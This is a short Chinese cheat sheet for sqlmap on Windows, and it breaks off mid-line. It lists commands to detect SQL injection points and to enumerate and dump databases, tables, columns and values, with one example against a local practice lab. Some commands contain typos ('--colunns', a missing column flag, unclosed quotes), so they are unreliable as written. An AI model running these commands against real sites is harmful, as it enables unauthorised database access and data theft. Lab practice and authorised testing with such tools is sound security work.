sqlmap常用命令解析
(前提:本命令运行环境为Windows,安装sqlmap后记得设置环境变量)
例如:我的安装路径为:C:\Python27\sqlmap,环境变量如下图:
/环境变量不会的可自行百度,不再赘述。/
sqlmap.py –h //显示基本帮助信息
sqlmap.py –hh //显示高级帮助信息
sqlmap.py -u “URL地址” //检测url是否存在注入点
sqlmap.py -u “URL地址” --dbs //列出此URL下所有数据库的名称
sqlmap.py -u “URL地址” --tables -D“数据库名” //列出所选数据库名中所有表名(备注:请根据真实情况填写数据库名)
sqlmap.py -u “URL地址” --colunns -T“表名” -D“数据库名 //列出所选数据库下所选表的所有字段名(备注:请根据真实情况填写数据库名、表名)
sqlmap.py -u “URL地址” --dump -“字段名” -T“表名” -D“数据库名//列出所选数据库下所选表下所选字段下所有字段的值(备注:请根据真实情况填写数据库名、表名、字段名)
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --is-dba //查看当前用户是否存在dba权限
sqlmap.py -u http://127.0.0.1/sql/Less-